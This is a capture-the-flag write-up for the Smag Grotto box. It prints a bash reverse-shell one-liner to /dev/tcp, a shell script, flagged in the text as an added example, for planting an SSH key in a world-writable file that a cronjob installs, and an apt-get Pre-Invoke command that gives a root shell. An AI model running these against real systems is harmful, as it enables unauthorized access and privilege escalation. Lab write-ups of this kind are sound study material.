May 24, 2021•215 words
After a basic scan (nothing too fancy needed here) you should see two open ports. Set SSH aside for now and check out the website. There seems to be very little, but a quick directory bust reveals a useful file you can download and analyze. This file gives you three powerful pieces of information:
- a set of credentials
- the subdomain where those credentials are used
- the path of the login page where you can use them
Add the subdomain to your /etc/hosts so you can reach it, then log in to the platform. The platform lets you execute commands, which is all you need for a reverse shell. My choice was the following:
bash -c "bash -i >& /dev/tcp/IP/PORT 0>&1"
Once you have your reverse shell (in whatever way you prefer), cronjobs are the place to look. One cronjob periodically installs the contents of a file as the SSH public key authorized to log in as jake. That source file is world-writable, so append your own public key to it, wait for the job to run, and log in as jake over SSH with the matching private key.
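The check and the write described above, as an added example that is not part of the original writeup: before touching the file the cronjob reads from, confirm it really is world-writable, then append the public key only if it is not already there (the cronjob will keep re-installing the file, so a duplicate entry is harmless but sloppy). The file path and the key are placeholders constructed for this example; the real path on the box is not reproduced here.

```shell
#!/bin/sh
# Added example, not from the original writeup.
# Helpers for planting an SSH public key in a world-writable file that a
# cronjob copies into a user's authorized keys. Path and key are placeholders.

# Return 0 if the "other" write bit is set on the file, 1 otherwise.
# Uses the symbolic mode from GNU stat, e.g. "-rw-rw-rw-": the 9th
# character is the world-write bit.
is_world_writable() {
    case "$(stat -c '%A' "$1" 2>/dev/null)" in
        ????????w*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Append the key line to the file unless an identical line is already present.
append_key_once() {
    grep -qxF -- "$2" "$1" 2>/dev/null || printf '%s\n' "$2" >> "$1"
}

# Only write to the file if we are actually allowed to, then append once.
plant_key() {
    if ! is_world_writable "$1"; then
        echo "refusing: $1 is not world-writable" >&2
        return 1
    fi
    append_key_once "$1" "$2"
}

# Usage (placeholders; the real path and your real public key go here):
# plant_key /path/to/cron-read-key-file "ssh-ed25519 AAAA... you@attacker"
# Then wait for the cronjob to fire and: ssh -i ~/.ssh/id_ed25519 jake@TARGET
```

The refusal in plant_key is deliberate: if the file is not world-writable, the write would fail anyway, and on a real engagement you want to know that before assuming the cronjob will pick up your key.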
Grab your flag in jake's home and do the usual check of your sudo privileges. You should then be on GTFOBins in less than two seconds: jake can run apt-get with sudo, and the Pre-Invoke hook below runs /bin/sh as root before the update even starts. The following command will grant you a root shell, so you can retrieve the last flag and be done with the Smag Grotto:
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh